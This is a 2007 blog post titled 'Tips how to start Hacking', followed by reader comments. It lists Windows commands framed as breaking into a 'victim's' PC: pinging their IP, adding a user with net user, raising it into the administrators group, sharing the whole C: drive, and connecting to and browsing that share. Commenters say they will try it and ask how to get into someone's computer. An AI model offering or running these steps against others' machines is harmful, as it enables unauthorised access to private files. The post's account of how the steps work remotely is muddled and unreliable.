Monday, December 3, 2007

Tips how to start Hacking !!

1) ping command
a cool way to say hello to victim
try
ping [victims ip goes here]
if the result is request timed out then the user is ofline
if the result is reply from [ip] bytes=32 time<1ms TTL 64
the victim is online.

2)net user [anyname] /add
it adds a new net user put any name inplace of [anyname]

3)net localgroup administrators [anyname] /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know wich version of windows xp you are going to try share.

4)net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
you can use any root dir. instead

5)net use \\victimip [nameofnetaccount]
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
where nameofnetuser is the name via which victim logs on

6)explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access! first

Love happen's once and the rest is just life!!!!

5 comments:

Anonymous said...

great tip mate, ill be sure to try that one out very soon ;)

Shiner. said...

Nice tips here mate,
getting an ip of a victim is easy, but not finding out the username of their account..

any info on how to remotly obtain this infomation?
email me @ mike.shiner@hotail.com

sanju said...

how to know the name of the net account of the victim plz do tell me thank u

sanju said...

how should i acces that guys computer plz tell mee thank you

Anonymous said...

Its a good intro for newbies.
I appriciate you are sharing it.

V peace

>